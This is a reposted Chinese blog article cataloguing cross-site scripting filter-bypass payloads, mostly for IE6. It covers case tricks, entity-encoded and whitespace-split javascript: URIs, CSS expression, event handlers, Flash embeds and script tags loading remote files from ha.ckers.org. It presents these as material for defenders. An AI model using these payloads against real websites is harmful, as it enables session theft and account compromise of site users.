XSS的常见变换--XSS攻击发展

XSS不具有浏览器通用性。不同的浏览器对同一XSS的适用不一样。相比较而言,IE8和Firefox相对更安全,本身就对XSS攻击有更严格的过滤。而IE6的安全性一般,即使攻击者的代码有些“变形”,浏览器还是会“尽力而为”的解析。而其他的一些浏览器如opera,XSS安全处理可能做得更差。

本文基本上是在IE6的基础上给大家分析XSS的变形和绕过。以便大家有针对性的防护。作者参阅了互联网上一些XSS攻防实战的例子,汇总成此文。

一、具体内容

XSS的一般原始构造:

<script>alert("anyunix")</script>

上述构造方式由于太过直接而容易被过滤,实际上,针对不同站点的不同过滤机制,对原始构造的适当变形有时就能绕过不少对XSS的检测。

二、发展

1:很简单,大家都知道会把<script>过滤掉,却往往忽略了大小写:

<sCripT>alert("anyunix")</Script>

2:<script>彻底被过滤了也不要紧,很多对象可以支持“javascript:”的形式代码执行:

<IMG SRC=javascript:alert("anyunix")>

3:当简单的"javascript"形式也被彻底过滤后。我们发现很多对象支持“&#ASCII”的表示方法,

<img src=j&#97vascript:alert("anyunix")>

<img src=j&#97;vascript:alert('anyunix')>

<img src=j&#x61vascript:alert('anyunix')>

<img src=j&#x61;vascript:alert('anyunix')>

&#97可以写成&#097,&#0097直至&#0000097也是可以执行的。

&#x61也是可以写成&#061,&#0061直至&#000061的。

4:如果上述编码亦被还原过滤,可以填入空格、制表符、换行符等空白字符:

<IMG SRC="jav ascript:alert('anyunix');">

5:也可以嵌入编码过后的TAB键等,char09,char10,char13都可以被嵌入:

<IMG SRC="jav&#x09;ascript:alert('anyunix');">

<IMG SRC="jav&#x0A;ascript:alert('anyunix');">

<IMG SRC="jav&#x0D;ascript:alert('anyunix');">

6:当直接用“javascript”终于被彻底禁绝,我们还可以使用其他属性执行XSS。

<DIV STYLE="width:expression(alert('anyunix'));">

<IMG SRC='vbscript:msgbox("anyunix")'>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

7:然后,理所当然衍生了新的绕过方式和利用形式。

A):插入注释/*....*/做干扰

<IMG STYLE="xss:expr/*XSS*/ession(alert('anyunix'))">

B):全角字符的干扰

<DIV STYLE="width:expression(alert('anyunix'));">

C):“\”的干扰

<STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>

8:如果直接执行被完全过滤,那我们就利用事件来执行XSS

<img src="#"οnerrοr=alert('anyunix')>

<img src=http://images.51cto.com/files/uploadimg/20130407/1014480.png"οnmοusemοve=alert(163)>

<BODY ONLOAD=alert('anyunix')>

<isindex type=imagesrc=1οnerrοr=alert('anyunix')>

9:flash可以用来执行XSS

<EMBED SRC="http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>

10:也可以利用各种其他标签

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<LINK REL="stylesheet"HREF="http://ha.ckers.org/xss.css">

<TABLE BACKGROUND="javascript:alert('XSS')">

其他的一些用于混淆、干扰和绕过的bypass实例:

<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

perl-e'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'>out

<IMG SRC="&#14; javascript:alert('XSS');">

如上,就是一些比较常见和实用的XSS绕过方法。在实际的运用中,往往是多种方法结合起来。


文章转载:http://netsecurity.51cto.com/art/201304/387678.htm

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值